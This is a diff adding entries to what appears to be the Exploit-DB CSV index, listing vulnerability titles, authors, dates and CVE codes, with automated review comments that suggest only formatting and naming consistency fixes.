48569,exploits/multiple/remote/48569.py,"HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)",2020-06-10,hyp3rlinx,remote,multiple,,2020-06-10,2020-06-10,0,,,,,,
@@ -11384,6 +11388,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,remote,multiple,21,2000-11-20,2016-12-04,1,OSVDB-11805;CVE-2000-0573,,,,http://www.exploit-db.comwu-ftpd-2.6.0-2.src.rpm,
9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,,2009-07-09,2017-04-01,1,CVE-2009-0695;OSVDB-55839,"Metasploit Framework (MSF)",,,,
1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21,2005-11-03,2018-01-18,1,OSVDB-19682;CVE-2005-3081,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwzdftpd-0.5.4.exe,
+51111,exploits/multiple/remote/51111.txt,"X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)",2023-03-28,"Hosein Vita",remote,multiple,,2023-03-28,2023-03-28,0,CVE-2022-38580,,,,,
25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",remote,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1077;OSVDB-15634,,,,,https://www.securityfocus.com/bid/13127/info
33577,exploits/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,remote,multiple,,2009-06-10,2017-01-06,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37997/info
38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,remote,multiple,,2015-12-14,2017-11-02,1,,"Metasploit Framework (MSF)",,,,
@@ -11882,6 +11887,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41928,exploits/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",webapps,multiple,,2017-04-25,2017-04-25,0,CVE-2017-7221,,,,,
43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",webapps,multiple,,2017-10-17,2017-10-17,0,CVE-2017-15276,,,,,
37271,exploits/multiple/webapps/37271.txt,"Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2015-06-12,"Dolev Farhi",webapps,multiple,80,2015-06-12,2015-06-12,0,CVE-2015-4420;OSVDB-123307;OSVDB-123306;OSVDB-123305,,,,,
+51113,exploits/multiple/webapps/51113.py,"OPSWAT Metadefender Core - Privilege Escalation",2023-03-28,"Ulascan Yildirim",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-32272,,,,,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,,2021-01-20,2021-01-20,0,,,,,,
10448,exploits/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,webapps,multiple,,2009-12-13,,1,,,,,,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,,2021-07-29,2021-07-29,0,,,,,,
@@ -11908,6 +11914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",2021-10-04,"Yasser Khan",webapps,multiple,,2021-10-04,2021-10-04,0,CVE-2021-41381,,,,,
+51099,exploits/multiple/webapps/51099.txt,"Pega Platform 8.1.0 - Remote Code Execution (RCE)",2023-03-28,"Marcin Wolak",webapps,multiple,,2023-03-28,2023-03-28,0,CVE-2022-24082,,,,,
42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,,
33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info
50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,,
@@ -14458,6 +14465,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80,2017-12-09,2017-12-13,1,CVE-2017-17595,"SQL Injection (SQLi)",,,,
49580,exploits/php/webapps/49580.txt,"Beauty Parlour Management System 1.0 - 'sername' SQL Injection",2021-02-19,"Thinkland Security Team",webapps,php,,2021-02-19,2021-02-19,0,,,,,,
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,,2020-06-18,2020-06-18,0,,,,,,
+51098,exploits/php/webapps/51098.txt,"Beauty-salon v1.0 - Remote Code Execution (RCE)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
5170,exploits/php/webapps/5170.txt,"BeContent 031 - 'id' SQL Injection",2008-02-21,Cr@zy_King,webapps,php,,2008-02-20,,1,OSVDB-42010;CVE-2008-0921,,,,,
17179,exploits/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,webapps,php,,2011-04-16,2011-04-16,1,,,,,,
26609,exploits/php/webapps/26609.txt,"Bedeng PSP 1.1 - 'baca.php?ckode' SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3953;OSVDB-21174,,,,,https://www.securityfocus.com/bid/15583/info
@@ -14848,6 +14856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,webapps,php,,2010-04-26,,1,,,,,,
26877,exploits/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,webapps,php,,2005-12-19,2013-07-16,1,CVE-2005-4375;OSVDB-21821,,,,,https://www.securityfocus.com/bid/15936/info
30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php,,2013-12-06,2013-12-06,0,OSVDB-100746,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5163.php
+51108,exploits/php/webapps/51108.txt,"BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)",2023-03-28,zetc0de,webapps,php,,2023-03-28,2023-03-28,0,CVE-2022-3552,,,,,
41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php,,2017-01-17,2017-01-17,0,,,,,http://www.exploit-db.comBoZoN-master.zip,
7930,exploits/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",webapps,php,,2009-01-29,,1,OSVDB-51725;OSVDB-51724,,,,,
9838,exploits/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,CVE-2009-3500;OSVDB-58297;OSVDB-58296,,,,,
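Review bot: The description "BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)" runs the product name and the version operator together, whereas other rows space them ("Zimbra < 8.8.11", "PEGA Platform <= 7.2 ML0"). Write it as "BoxBilling <= 4.22.1.5" so the product name stays searchable as its own token and reads like the existing "BoxBilling 3.6.11" row above it.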
@@ -19392,6 +19401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php,,2007-07-11,2013-12-15,1,,,,,,https://www.securityfocus.com/bid/24864/info
37643,exploits/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,webapps,php,,2012-08-27,2016-12-18,1,CVE-2012-0744;OSVDB-84917,,,,,https://www.securityfocus.com/bid/55125/info
32546,exploits/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,webapps,php,,2014-03-26,2014-03-26,0,CVE-2013-6719;OSVDB-104072;CVE-2013-6720,,,,,
+51119,exploits/php/webapps/51119.txt,"iBooking v1.0.8 - Arbitrary File Upload",2023-03-28,d1z1n370/oPty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php,,2010-06-19,,1,OSVDB-76887;CVE-2010-5020;CVE-2010-0804;OSVDB-62681,,,,,
6444,exploits/php/webapps/6444.txt,"iBoutique 4.0 - 'cat' SQL Injection",2008-09-12,r45c4l,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48127;CVE-2008-4354,,,,,
19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php,,2012-07-20,2016-12-22,0,OSVDB-84391,,,,,http://secpod.org/advisories/SecPod_NetArt_Media_iBoutique_SQLi_Vuln.txt
@@ -20132,6 +20142,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",webapps,php,,2007-05-15,2013-12-05,1,CVE-2007-1898;OSVDB-34088,,,,,https://www.securityfocus.com/bid/23989/info
6549,exploits/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,webapps,php,,2008-09-23,,1,OSVDB-51677;CVE-2008-5992;OSVDB-51676;OSVDB-48554;OSVDB-48553,,,,,
6542,exploits/php/webapps/6542.txt,"JETIK-WEB Software - 'kat' SQL Injection",2008-09-23,d3v1l,webapps,php,,2008-09-22,2016-12-22,1,OSVDB-48518;CVE-2008-6401,,,,,
+51104,exploits/php/webapps/51104.txt,"Jetpack 11.4 - Cross Site Scripting (XSS)",2023-03-28,"Behrouz Mansoori",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
27619,exploits/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24494,,,,,https://www.securityfocus.com/bid/17449/info
27617,exploits/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24492,,,,,https://www.securityfocus.com/bid/17449/info
27618,exploits/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,webapps,php,,2006-04-11,2013-08-16,1,CVE-2006-1760;OSVDB-24493,,,,,https://www.securityfocus.com/bid/17449/info
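Review bot: The 51104 description spells the class "Cross Site Scripting" without the hyphen, while the three JetPhoto rows right after it use "Cross-Site Scripting", so a text search on the hyphenated form will miss this entry. Use the hyphenated spelling, and consider naming the affected parameter or component in the title as the JetPhoto rows do ('detail.php?page').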
@@ -23275,6 +23286,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
24279,exploits/php/webapps/24279.txt,"Moodle Help Script 1.x - Cross-Site Scripting",2004-07-13,morpheus[bd],webapps,php,,2004-07-13,2013-01-21,1,CVE-2004-0725;OSVDB-7865,,,,,https://www.securityfocus.com/bid/10718/info
46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,"Cross-Site Scripting (XSS)",,,,
46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,,2019-05-21,2019-05-21,0,,Traversal,,,,
+51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
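Review bot: The 51115 row leaves the tags field empty, although the two 46881 rows directly above it fill that field ("Cross-Site Scripting (XSS)") and the title already states the class. Set the same tag here so tag-based filtering returns this Moodle entry too, and say in the title whether the issue is stored or reflected if 51115.txt states it.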
@@ -24501,6 +24513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
+51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php,,2018-05-23,2018-05-23,0,,,,,,
48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,,2020-06-23,2020-06-23,0,,,,,,
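Review bot: The 51103 description is only "Multiple Vulnerabilities", while the recap in 51103.txt lists SQL injection, RCE, stored XSS and reflected XSS. Anyone triaging from the CSV alone cannot tell that this row covers an RCE; name the classes in the description or tags, as the existing 48383 row for the same product does with its 'p' SQL Injection title.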
@@ -28482,6 +28495,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,,2020-12-14,2020-12-14,0,,,,,,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,,2020-12-11,2021-02-18,0,CVE-2020-11819,,,,,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,,2020-09-02,2021-02-18,0,CVE-2020-11819,,,,,
+51121,exploits/php/webapps/51121.txt,"rukovoditel 3.2.1 - Cross-Site Scripting (XSS)",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
46608,exploits/php/webapps/46608.txt,"Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting",2019-03-26,"Javier Olmedo",webapps,php,80,2019-03-26,2019-03-26,0,CVE-2019-7400,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comrukovoditel_2.4.zip,https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80,2018-10-16,2018-10-18,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comrukovoditel_2.3.zip,
46011,exploits/php/webapps/46011.rb,"Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)",2018-12-19,AkkuS,webapps,php,,2018-12-19,2019-03-06,0,CVE-2018-20166,"Metasploit Framework (MSF)",,,http://www.exploit-db.comrukovoditel_2.3.1.zip,
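Review bot: The 51121 description starts with lowercase "rukovoditel", while every other row in this hunk writes "Rukovoditel". Case-sensitive product matching will treat this as a different name, so capitalise it. The tags field is also empty here although 46608 carries "Cross-Site Scripting (XSS)" for the same class.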
@@ -28814,6 +28828,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",webapps,php,,2011-05-03,2015-01-05,1,,,,,,https://www.securityfocus.com/bid/47701/info
34146,exploits/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",webapps,php,,2010-06-15,2014-07-23,1,,,,,,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,,2020-05-13,2020-05-13,0,,,,,,
+51120,exploits/php/webapps/51120.txt,"Senayan Library Management System v9.5.0 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
2117,exploits/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz,
3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz,
4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php,,2007-06-03,,1,OSVDB-35741;CVE-2007-3082,,,,,
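Review bot: The 51120 title gives no script or parameter for the SQL injection, unlike 3827 a few rows down ('sendcard.php?form'), so the row cannot be tied to a code path without opening 51120.txt. Add the affected endpoint or parameter to the description, and drop the "v" from "v9.5.0" to match the bare versions in the neighbouring rows.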
@@ -29443,6 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip,
33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info
10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip,
+51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info
18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php,,2011-04-20,2011-04-20,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
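Review bot: The 51116 title "Social-Share-Buttons v2.2.3" does not say which application the component belongs to, whereas 23382 above it names its host ("Social Sites MyBB Plugin 0.2.2"). State the host platform in the description so the entry can be matched to an installed asset, and write the version without the "v" prefix as the other rows do.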
@@ -29816,6 +29832,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",2021-05-17,"Fellipe Oliveira",webapps,php,,2021-05-17,2021-10-29,0,CVE-2018-19422,,,,,
50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",2022-02-11,"Aryan Chehreghani",webapps,php,,2022-02-11,2022-02-11,0,,,,,,
45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,,2018-08-06,2018-08-08,0,CVE-2018-14840,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comsubrion_cms_4.2.1.zip,
+51110,exploits/php/webapps/51110.txt,"Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)",2023-03-28,"Sinem Şahin",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php,,2005-09-13,2013-06-17,1,CVE-2005-2952;OSVDB-19380,,,,,https://www.securityfocus.com/bid/14817/info
22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php,,2003-05-21,2012-11-11,1,,,,,,https://www.securityfocus.com/bid/7651/info
10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php,,2009-11-28,,1,,,,,,
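Review bot: The 51110 row adds a second XSS entry for Subrion CMS 4.2.1 next to 45150, which already covers Cross-Site Scripting in that version and carries CVE-2018-14840, but the new row has an empty codes field and nothing in the title to tell the two apart. If this is a distinct issue, name the affected field or page in the description; if it is the same one, reference the existing CVE in codes.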
@@ -33879,6 +33896,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",2021-10-04,"Jordan Glover",webapps,php,,2021-10-04,2021-10-04,0,,,,,,
47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80,2019-08-19,2019-08-19,0,CVE-2019-14430,"SQL Injection (SQLi)",,,http://www.exploit-db.comYouPHPTube-7.2.tar.gz,
47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80,2019-08-30,2019-08-30,0,,,,,http://www.exploit-db.comYouPHPTube-7.4.tar.gz,
+51101,exploits/php/webapps/51101.txt,"YouPHPTube<= 7.8 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php,,2010-04-29,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39796/info
38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php,,2013-03-08,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58399/info
12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php,,2010-05-27,,0,,,,,,
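Review bot: The 51101 description reads "YouPHPTube<= 7.8" with no space between the product name and the operator, so tokenising on whitespace yields "YouPHPTube<=" as the product, unlike the 47294 and 47326 rows above ("YouPHPTube 7.2", "YouPHPTube 7.4"). Write "YouPHPTube <= 7.8". As with any "Multiple Vulnerabilities" title, listing the classes in the description or tags would let the row be triaged without opening the file.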
@@ -34175,6 +34193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
+51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,,2021-07-06,2021-07-06,0,CVE-2019-14322,,,,http://www.exploit-db.comwerkzeug-0.15.4.zip,
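Review bot: The 51109 title puts the precondition first ("Authenticated Server Side Request Forgery (SSRF)"), while 49803 two rows below uses the trailing form "Remote Code Execution (Authenticated)". Use the trailing "(Authenticated)" qualifier so filters on that suffix pick up both rows. The CVE-2022-36551 entry in the codes field is the right place for it.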
@@ -38120,6 +38139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800,2010-07-06,2010-07-06,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14236.png,,
4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows,,2007-07-09,2016-10-05,1,CVE-2007-3655,,,,,
17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,,2011-09-23,2011-09-23,1,OSVDB-75800;OSVDB-75799;OSVDB-75798;OSVDB-75796;OSVDB-75795;OSVDB-75684,,,,,
+51102,exploits/windows/dos/51102.txt,"SuperMailer v11.20 - Buffer overflow DoS",2023-03-28,"Rafael Pedrero",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
